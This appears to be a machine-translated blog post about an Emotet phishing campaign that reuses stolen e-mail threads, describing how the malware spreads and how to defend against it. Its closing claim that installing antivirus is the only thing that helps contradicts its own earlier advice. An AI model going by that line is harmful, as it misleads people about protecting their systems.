A wave of phishing of unimagined quality is currently spreading through e-mail inboxes around the world, also and especially in German-speaking accounts. The special feature is that the phishing e-mail hijacks an existing conversation and embeds a fake link to malware.
Many
attentive users are currently discovering that they have found e-mails
with fake links in their mailboxes . The known
communication partner supposedly sends a link to a document with an invoice. Allegedly
with a domain that corresponds to the sender domain. In the background via
HTML, however, this link refers to a hijacked server with poorly maintained
software through which the malware is spread. Malware called
Emotet is believed to be responsible for these emails.
This attack scenario gives rise to a number
of questions that I will try to answer.
How Does Emotet Work?
In most cases ,
the senders
are fake , and the e-mails are not sent via the
infrastructure of one of the parties involved in the communication, but via
servers on the Internet. In most cases, the sender is therefore also
forged, a technical sender address has been assigned to a known name of the
conversation. Depending on the setting of the e-mail client, unknown
e-mail addresses or contact persons are not displayed.
The e-mail history of the current campaign corresponds to a real e-mail
history in the past .
Where Did the Malware Get These Old
Mails From?
At the moment it looks as if the e-mails of the mailboxes were
copied in the last six months in the event of infections . This
previous campaign was carried out with the help of fake invoices from large
providers such as Amazon, O2, DHL or Telekom. In the beginning only
addresses were extracted from the stolen e-mails for further dissemination, now
these complete e-mail histories are used to increase the trustworthiness of the
phishing e-mail. Thanks to the internal IDs in the headers of the e-mails,
depending on the e-mail client, these can also be assigned to the old communication
immediately. Here lies a possible weak point of the attack
wave:the previous conversation may have been a relatively long
time ago. Receiving an invoice or document today for a transaction from
last year may seem strange to one or the other recipient.
It has not been finally clarified whether the e-mails were
hijacked on the part of the sender or recipient. It can currently be
assumed that the malware stole both received and sent
e-mails and continued to use them correctly .
Why Is Emotet so Dangerous?
Emotet is a big problem for virus scanners because it uses many
camouflage and self-modification techniques. It has a so-called polymorphic
design, which means that it can change in order to
outsmart signature-based virus scanners. In addition, it has effective
detection of whether it is running in a virtual environment . If
he thinks he is walking in a sandbox ,
he is completely inconspicuous.
Aside from the current campaign, Emotet not only spreads via email
but also
has the ability to scan an internal network and tries to
spread itself further with network sniffing and brute force attacks . Another
possibility is the spread via the EternalBlue vulnerability, which became known
through WannaCry. Using these combined methods ,
it can also spread like a worm within networks . With
the BruteForce attacks, he can take over further internal accounts and copy
further e-mails there, which can then be misused again for the phishing
campaign. The web download in the PowerShell script automatically uses the
system-wide configured proxy of the system.
Emotet currently uses a PowerShell script in the e-mails that works on the various
Windows versions and leads to infection there. If a system has been
infected, the first steps are initially
carried out :
§ The
malware is updated to the current version .
§ The
malware then tries to anchor itself permanently
in the system .
§ In
the third step, the various modules are
then loaded
and executed . These represent the actual malicious
or attack components.
In corporate networks, this is the first step behind the door to
take over not just a single PC but the entire network. The damage can be
correspondingly high, because the Trojan gives the attacker full access to
the entire network infrastructure of the company. As
early as December 2018, the BSI issued a corresponding warning about the
possible damage caused by Emotet. Emotet can, for example, reload banking
Trojans or simply delete or encrypt internal data. If the network
infrastructure is paralyzed, it can lead to large-scale production downtimes.
How Can I Protect Myself from Emotet?
Trying to delete the malware from the system and clean it up is
not effective. Due to the modular design and the reloaded code, presumably
not all components are recognized and deleted by the AV software. The
recommendation is to set up an infected system completely and
completely from scratch . It can also be assumed that
all passwords stored on the system, for example in the browser, are to be
viewed as compromised and must be changed.
Anyone who operates a SIEM or log
management system should check whether they can have the command
and control server identified by Emotet . These
rotate regularly, so that an infection can be assumed even if there are
frequent hits in the logs, since these IPs may have been used before and
afterwards by a legitimate service.
All in all, Emotet has been a dangerous tool in the hacker's
arsenal for a while. However, with the current campaign with stolen e-mail
histories, the attackers have now entered a new level of phishing. This
campaign leads to insecurity on your own side due to the stolen emails and puts
the communication partner in a bad light. It is currently unclear
on which page the emails were stolen . All companies
involved in communication must check their infrastructures.
In addition to checking that the antivirus software is up-to-date, settings
in the e-mail client that display both real URLs in HTML e- mails
and the full sender address including the technical sender are helpful . The
usual recommendations to install all security updates for operating
systems and applications such as browsers, e-mail clients
and Office in a timely manner also reduce the attack surface here. A
network segmentation helps against spreading in your own
network, for example only allowing desired SMB or RDP
connections and making it more difficult to spread to other clients.
And the only thing that helps against the attackers' latest tricks is installing an antivirus.
Comments
Post a Comment